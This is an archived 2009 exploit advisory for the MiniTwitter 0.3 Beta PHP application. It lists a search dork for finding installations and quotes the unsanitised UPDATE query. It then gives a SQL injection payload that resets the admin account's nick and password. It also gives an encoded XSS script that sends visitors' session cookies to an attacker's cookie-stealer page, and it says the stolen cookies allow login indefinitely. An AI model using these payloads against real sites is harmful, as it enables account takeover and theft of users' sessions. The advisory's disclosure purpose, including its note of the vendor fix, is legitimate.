what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MiniTwitter 0.3 Beta SQL Injection

MiniTwitter 0.3 Beta SQL Injection
Posted May 25, 2009
Authored by YEnH4ckEr

MiniTwitter versions 0.3-Beta and below suffer from remote SQL injection and cross site scripting vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | dc6e0a0e1309a74dcfc723b6db99848b02e2c34a14526b35359f3b9f83b4ac2b

MiniTwitter 0.3 Beta SQL Injection

Change Mirror Download
------------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES --MiniTwitter<=v0.3-Beta-->
------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mt.bioscriptsdb.com/
-->DOWNLOAD: http://sourceforge.net/projects/minitt/
-->DEMO: http://www.bioscripts.net/minitwitter/index.php
-->CATEGORY: Social Networking
-->DESCRIPTION: Your business needs a private twitter. You can add...
several twitters account and use this twitter as a buckup of all...
-->RELEASED: 2009-05-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "BioScripts"
-->CATEGORY: USER OPTIONS CHANGING (SQLi) / COOKIE STEALER (XSS)
-->AFFECT VERSION: <= 0.3 Beta
-->Discovered Bug date: 2009-05-01
-->Reported Bug date: 2009-05-02
-->Fixed bug date: 2009-05-10
-->Info patch (0.4 Beta): http://sourceforge.net/projects/minitt/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



##############################
//////////////////////////////

USER OPTIONS CHANGING (SQLi):

/////////////////////////////
##############################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>



-----------
FILE VULN:
-----------

..

$nombre = $_POST["nombre"];
$apellidos = $_POST["apellidos"];
$dia = $_POST["fechadia"];
$mes = $_POST["fechames"];
$anio = $_POST["fechaanio"];
$correo = $_POST["correo"];
$bio = $_POST["bio"];
$gravatar = $_POST["gravatar"];
$timeline = $_POST["timeline"];
$country = $_POST["country"];
$state = $_POST["state"];
$sex = $_POST["sex"];
$show = $_POST["showing"];

..

$pass1 = $_POST["pass1"];
$pass2 = $_POST["pass2"];

..

$optquery = "UPDATE mt_users SET nombre = '$nombre', apellidos = '$apellidos', country = '$country', state='$state', sex='$sex', correo = '$correo', dia = '$dia', mes = '$mes', anio = '$anio', bio = '$bio', gravatar = '$gravatar' , timeline = '$timeline', showing = '$show', twitter = '$twitter', accounts = '$twitteraccounts' WHERE id_usr = '$id_usr'";

..


------
PoC:
------


When an user change his options, he can inject sql code and change options of other user

Choose any option, for example name.

Name: name=y3nh4ck3r', [SQL] /*


---------
EXPLOIT:
---------

Name: name=y3nh4ck3r',apellidos = 'y3nh4ck3r', nick='y3nh4ck3r' country = 'y3nh4ck3r', state='y3nh4ck3r', sex='0', password=MD5(12345) correo = 'y3nh4ck3r@gmail.com', dia = '0', mes = '0', anio = '0', bio = 'y3nh4ck3r', gravatar = '' , timeline = '', showing = '', twitter = '', accounts = '' WHERE id_usr = '1'/*


Return: Changed options for user id 1.

nick=y3nh4ck3r
password=12345



#############################
/////////////////////////////

COOKIES STEALING VULN (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


---------
EXPLOIT:
---------


Go to Link --> http://[HOST]/[HOME_PATH]/index.php?go=opt

Change your e-mail to:


<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>


Use your PHP Script (Cookies Stealer)


When you steal the cookies, you always could log in because their format is:


cooknameuniversal= nick user

passnameuniversal= password (md5 hash)


So they are universal :P


#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close